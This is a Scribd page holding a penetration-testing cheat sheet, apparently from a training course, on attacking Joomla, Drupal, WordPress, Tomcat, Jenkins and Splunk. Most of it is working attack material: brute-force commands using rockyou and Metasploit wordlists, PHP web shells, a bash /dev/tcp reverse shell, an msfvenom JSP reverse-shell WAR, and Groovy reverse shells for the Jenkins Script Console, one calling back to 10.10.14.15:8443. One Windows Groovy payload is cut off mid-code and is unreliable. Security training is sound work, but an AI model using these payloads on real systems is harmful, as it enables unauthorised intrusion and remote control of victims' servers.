Scribd
Upload
84 views3 pages

Attacking Common Applications Module Cheat Sheet

This document is a cheat sheet for attacking common applications, detailing various command-line tools and scripts used for web application security testing. It includes commands for scanning, brute-forcing, and exploiting vulnerabilities in systems like Joomla, Drupal, and Tomcat. The document provides specific syntax and options for each command to facilitate penetration testing efforts.

Uploaded by

paratester696
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
84 views3 pages

Attacking Common Applications Module Cheat Sheet

This document is a cheat sheet for attacking common applications, detailing various command-line tools and scripts used for web application security testing. It includes commands for scanning, brute-forcing, and exploiting vulnerabilities in systems like Joomla, Drupal, and Tomcat. The document provides specific syntax and options for each command to facilitate penetration testing efforts.

Uploaded by

paratester696
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

ATTACKING COMMON APPLICATIONS

CHEAT SHEET
Command Description

sudo vim /etc/hosts Opens the /etc/hosts with vim to start adding
hostnames

sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA Runs an nmap scan using common web
web_discovery -iL scope_list application ports based on a scope list (scope_list)
and outputs to a file (web_discovery) in all formats
(-oA)

eyewitness --web -x web_discovery.xml -d Runs eyewitness using a file generated by an


<nameofdirectorytobecreated> nmap scan (web_discovery.xml) and creates a
directory (-d)

cat web_discovery.xml | ./aquatone -nmap Concatenates the contents of nmap scan output
(web_discovery.xml) and pipes it to aquatone
(./aquatone) while ensuring aquatone recognizes
the file as nmap scan output (-nmap)

sudo wpscan --url <http://domainnameoripaddress> --enumerate Runs wpscan using the --enmuerate flag. Can
replace the url with any valid and reachable URL in
each challenge

sudo wpscan --password-attack xmlrpc -t 20 -U john -P Runs wpscan and uses it to perform a password
/usr/share/wordlists/rockyou.txt --url attack (--password-attack) against the specified url
<http://domainnameoripaddress>
and references a word list
(/usr/share/wordlists/rockyou.txt)

curl -s cURL command used to execute commands


http://<hostnameoripoftargetsite/path/to/webshell.php?cmd=id (cmd=id) on a vulnerable system utilizing a php-
based webshell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip address of PHP code that will execute a reverse shell on a
attack box>/<port of choice> 0>&1'"); Linux-based system

droopescan scan joomla --url http://<domainnameoripaddress> Runs droopescan against a joomla site located at
the specified url
Command Description

sudo python3 joomla-brute.py -u Runs joomla-brute.py tool with python3 against a


http://dev.inlanefreight.local -w /usr/share/metasploit- specified url, utilizing a specified wordlist
framework/data/wordlists/http_default_pass.txt -usr
<username or path to username list> (/usr/share/metasploit-
framework/data/wordlists/http_default_pass.txt)
and user or list of usernames (-usr)

<?php system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); ?> PHP code that will allow for web shell access on a
vulnerable drupal site. Can be used through
browisng to the location of the file in the web
directory after saving. Can also be leveraged
utilizing curl. See next command.

curl -s <http://domainname or IP address of site> /node/3? Uses curl to navigate to php web shell file and run
dcfdd5e021a869fcc6dfaef8bf31377e=id | grep uid | cut -f4 - system commands (=id) on the target
d">"

gobuster dir -u <http://domainnameoripaddressofsite> -w gobuster powered directory brute forcing attack


/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt refrencing a wordlist
(/usr/share/dirbuster/wordlists/directory-list-
2.3-small.txt)

auxiliary/scanner/http/tomcat_mgr_login Useful Metasploit scanner module used to perform


a bruteforce login attack against a tomcat site

python3 mgr_brute.py -U Runs mgr_brute.py using python3 against the


<http://domainnameoripaddressofTomCatsite> -P /manager -u specified website starts in the /manager directory (-
/usr/share/metasploit-
framework/data/wordlists/tomcat_mgr_default_users.txt -p P /manager) and references a specified user or
/usr/share/metasploit- userlist ( -u) as well as a specified password or
framework/data/wordlists/tomcat_mgr_default_pass.txt password list (-p)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip address of Generates a jsp-based reverse shell payload in the
attack box> LPORT=<port to listen on to catch a shell> -f form of a .war file utilizing msfvenom
war > backup.war

nmap -sV -p 8009,8080 <domainname or IP address of tomcat Nmap scan useful in enumerating Apache Tomcat
site> and AJP services

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec Groovy-based reverse shell payload/code that can


5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do work with admin access to the Script Console of a
\$line 2>&5 >&5; done"] as String[]) p.waitFor()
Jenkins site. Will work when the underlying OS is
Linux

def cmd = "cmd.exe /c dir".execute(); Groovy-based payload/code that can work with
println("${cmd.text}"); admin access to the Script Console of a Jenkins
site. This will allow webshell access and to execute
commands on the underlying Windows system
Command Description

String host="localhost"; int port=8044; String Groovy-based reverse shell payload/code that can
cmd="cmd.exe"; Process p=new work with admin acess to the Script Console of a
ProcessBuilder(cmd).redirectErrorStream(true).start();Socket
s=new So); Jenkinssite. Will work when the underlying OS is
Windows

reverse_shell_splunk A simple Splunk package for obtaining revershells


on Windows and Linux systems

You might also like